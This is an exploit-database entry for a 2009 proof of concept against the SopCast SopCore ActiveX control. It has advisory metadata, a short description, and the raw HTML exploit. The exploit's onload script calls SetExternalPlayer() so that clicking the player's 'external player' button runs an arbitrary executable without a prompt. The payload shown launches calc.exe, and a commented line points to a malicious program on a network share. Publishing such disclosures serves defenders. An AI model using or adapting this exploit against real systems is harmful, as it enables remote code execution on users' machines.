Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc

vendor:

SopCore Control

by:

Nine:Situations:Group::surfista

9.3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: SopCore Control

Affected Version From: 3.0.3.501

Affected Version To: 3.0.3.501

Patch Exists: NO

Related CWE: N/A

CPE: a:sopcast:sopcast_sopcore_control

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc

Through the SetExternalPlayer() method and the ExternalPlayer property, it is possible to associate an arbitrary executable to the 'external player' button, which opens Windows Media Player by default. When the user clicks this button, the executable is launched without prompts. Also, this value is stored in config.xml, inside the sopcast local folder for further use, ex. with the sopcast client application.

Mitigation:

Ensure that the SetExternalPlayer() method is not used to launch arbitrary executables.

Source

Exploit-DB raw data:

<!-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
     user assisted remote code execution poc
     by Nine:Situations:Group::surfista (IE7/8)

our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/

Through the SetExternalPlayer() method and the ExternalPlayer property
is possible to associate an arbitrary executable to the "external player"
button (for clearness see http://www.sopcast.com/docs/ where the player
control buttons are showed) which opens Windows Media Player by default.
When the user click this button, the executable is launched without prompts
Also this value is stored in config.xml, inside the sopcast local folder
for further use, ex. with the sopcast client application
Note: this control is safe for scripting and safe for initialization
-->
<HTML>
<HEAD>
<script language="Javascript" type="text/JavaScript">
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
</script>
</HEAD>
<BODY>
<OBJECT
        ID="SopPlayer"
        name="SopPlayer"
        CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
        HEIGHT=375
        WIDTH=375>
</OBJECT>
</BODY>
</HTML>

# milw0rm.com [2009-03-03]